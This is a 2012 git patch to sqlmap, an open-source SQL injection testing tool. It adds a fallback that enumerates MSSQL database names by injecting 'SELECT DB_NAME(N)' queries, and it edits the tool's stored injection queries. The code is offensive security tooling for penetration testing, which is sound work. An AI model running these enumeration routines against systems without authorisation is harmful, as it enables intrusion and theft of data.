From 27fdccc858da73d8482456176e129c2530ac83b7 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 3 Jul 2012 20:15:17 +0200
Subject: [PATCH] Update for Issue #55 (falling back to SELECT DB_NAME(N))

---
 plugins/dbms/sybase/enumeration.py |  4 ++--
 plugins/generic/enumeration.py     | 20 ++++++++++++++++++++
 xml/queries.xml                    |  2 +-
 3 files changed, 23 insertions(+), 3 deletions(-)

diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py
index 38dbfea25..607416e69 100644
--- a/plugins/dbms/sybase/enumeration.py
+++ b/plugins/dbms/sybase/enumeration.py
@@ -36,9 +36,9 @@ class Enumeration(GenericEnumeration):
         query = rootQuery.inband.query
 
         if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR)) or conf.direct:
-            blinds = [False, True]
+            blinds = (False, True)
         else:
-            blinds = [True]
+            blinds = (True,)
 
         for blind in blinds:
             retVal = self.__pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind)
diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py
index 75ac02730..c1cd0a766 100644
--- a/plugins/generic/enumeration.py
+++ b/plugins/generic/enumeration.py
@@ -764,6 +764,26 @@ class Enumeration:
                     if db:
                         kb.data.cachedDbs.append(safeSQLIdentificatorNaming(db))
 
+        if not kb.data.cachedDbs and Backend.isDbms(DBMS.MSSQL):
+            if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR)) or conf.direct:
+                blinds = (False, True)
+            else:
+                blinds = (True,)
+
+            for blind in blinds:
+                count = 0
+                kb.data.cachedDbs = []
+                while True:
+                    query = rootQuery.inband.query2 % count
+                    value = inject.getValue(query, blind=blind)
+                    if not value:
+                        break
+                    else:
+                        kb.data.cachedDbs.append(unArrayizeValue(value))
+                        count += 1
+                if kb.data.cachedDbs:
+                    break
+
         if not kb.data.cachedDbs:
             infoMsg = "falling back to current database"
             logger.info(infoMsg)
diff --git a/xml/queries.xml b/xml/queries.xml
index 4fb72f59b..878db910e 100644
--- a/xml/queries.xml
+++ b/xml/queries.xml
@@ -183,7 +183,7 @@
         <privileges/>
         <roles/>
         <dbs>
-            <inband query="SELECT name FROM master..sysdatabases"/>
+            <inband query="SELECT name FROM master..sysdatabases" query2="SELECT DB_NAME(%d)"/>
             <blind query="SELECT TOP 1 name FROM master..sysdatabases WHERE name NOT IN (SELECT TOP %d name FROM master..sysdatabases ORDER BY name) ORDER BY name" count="SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases"/>
         </dbs>
         <tables>